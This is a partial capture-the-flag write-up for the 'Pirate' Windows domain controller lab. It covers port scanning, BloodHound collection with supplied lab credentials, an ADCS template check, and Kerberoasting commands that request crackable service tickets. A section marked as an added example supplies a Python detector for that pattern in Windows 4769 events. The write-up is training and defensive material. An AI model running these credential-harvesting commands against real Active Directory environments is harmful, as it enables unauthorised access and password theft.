Pirate
Overview
Pirate is a hard Windows box exposing a domain controller (DC01.pirate.htb)
with a set of starting pentest credentials. The intended entry point appears to
be through the Active Directory environment — the notes cover initial BloodHound
collection and Kerberoasting, but the crackable path was not resolved within
the session documented here.
Path (partial): pentest creds → BloodHound → Kerberoast ADM / A.WHITE SPNs → (crack) → …
Enumeration
The nmap scan confirms a Windows domain controller. Notable ports are DNS (53),
HTTP (80), Kerberos (88), LDAP (389/636/3268/3269), SMB (445), and RPC (593).
The SSL certificate on LDAP pins the hostname to DC01.pirate.htb in the
pirate.htb domain.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb)
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap (Domain: pirate.htb, commonName=DC01.pirate.htb)
3268/tcp open ldap
3269/tcp open ssl/ldap
Service Info: Host: DC01; OS: Windows

The box comes with starting credentials:
pentest / p3nt3st2025!&
Enumeration — BloodHound Collection
With valid credentials, BloodHound collection runs via NetExec's built-in
--bloodhound flag (output from the Python bloodhound.py collector failed to
ingest properly):
$ nxc ldap 10.129.7.69 -u pentest -p 'p3nt3st2025!&' -d pirate.htb \
--bloodhound --collection All \
--dns-server 10.129.7.69 --kdcHost 10.129.7.69
Checking for vulnerable ADCS certificate templates turns up nothing:
$ certipy find -u 'pentest@pirate.htb' -p 'p3nt3st2025!&' \
-dc-ip 10.129.7.69 -vulnerable -stdout

BloodHound identifies two Kerberoastable accounts:

Kerberoasting
Both Kerberoastable SPNs are targeted — one of them appears to be ADM,
with a possible secondary pivot to A.WHITE:

Requesting the service tickets:
$ GetUserSPNs.py pirate.htb/pentest:'p3nt3st2025!&' \
-dc-ip 10.129.7.69 -request

Offline cracking against standard wordlists did not recover the ADM hash.
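On the defender's side, the ticket requests above leave Windows Security Event 4769 entries on the DC. The following Python snippet is an added example, not part of the original writeup, that flags the Kerberoasting pattern over constructed sample records: one requester pulling RC4 (etype 0x17) service tickets for several user-account SPNs within a short window. The key=value log layout, timestamps, client IPs and service names are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 (service ticket requested) records, one per line.
# Field names mirror the event's TargetUserName / ServiceName /
# TicketEncryptionType / IpAddress, flattened for the example (assumption).
SAMPLE_4769 = """\
2025-06-01T10:00:01 EventID=4769 Account=pentest@PIRATE.HTB Service=DC01$ Etype=0x12 Client=10.10.14.5
2025-06-01T10:00:05 EventID=4769 Account=pentest@PIRATE.HTB Service=adm Etype=0x17 Client=10.10.14.5
2025-06-01T10:00:06 EventID=4769 Account=pentest@PIRATE.HTB Service=a.white Etype=0x17 Client=10.10.14.5
2025-06-01T10:00:07 EventID=4769 Account=pentest@PIRATE.HTB Service=krbtgt Etype=0x17 Client=10.10.14.5
2025-06-01T11:30:00 EventID=4769 Account=j.doe@PIRATE.HTB Service=sql01$ Etype=0x12 Client=10.10.14.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=4769 Account=(?P<acct>\S+) Service=(?P<svc>\S+) "
    r"Etype=(?P<etype>0x[0-9a-fA-F]+) Client=(?P<client>\S+)$"
)

def parse_4769(text):
    """Parse the flattened log lines into dicts; skip lines that do not match."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            ev["etype"] = int(ev["etype"], 16)
            events.append(ev)
    return events

def is_roastable_request(ev):
    """RC4 ticket for a user-account SPN: machine accounts ($) and krbtgt are not targets."""
    return ev["etype"] == 0x17 and not ev["svc"].endswith("$") and ev["svc"].lower() != "krbtgt"

def detect_kerberoast(events, window=timedelta(minutes=5), min_spns=2):
    """Flag (account, client) pairs requesting RC4 tickets for >= min_spns distinct SPNs in a window."""
    by_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_requester[(ev["acct"], ev["client"])].append(ev)
    findings = []
    for (acct, client), evs in by_requester.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):  # sliding window anchored at each event
            spns = {e["svc"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(spns) >= min_spns:
                findings.append({"account": acct, "client": client, "spns": sorted(spns)})
                break
    return findings

if __name__ == "__main__":
    for f in detect_kerberoast(parse_4769(SAMPLE_4769)):
        print(f"Possible Kerberoasting by {f['account']} from {f['client']}: {f['spns']}")
```

Tuning the threshold and window, and enabling AES-only tickets on service accounts so RC4 requests stand out, are the practical knobs.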
Notes
Thin notes — the writeup ends at the Kerberoasting stage. The session
ran out of steam after the ADM hash resisted rockyou.txt; no further
pivots, credentials, or paths were documented. The full exploitation chain
remains to be revisited.
Takeaways
- Pre-supplied pentest credentials enable fast BloodHound collection — go
straight to nxc ldap --bloodhound to avoid the Python collector's ingest quirks.
- Kerberoastable service accounts are only useful if the ticket cracks. Strong
service-account passwords (or AES-only tickets) require larger wordlists or
rule-based mangling before cracking succeeds.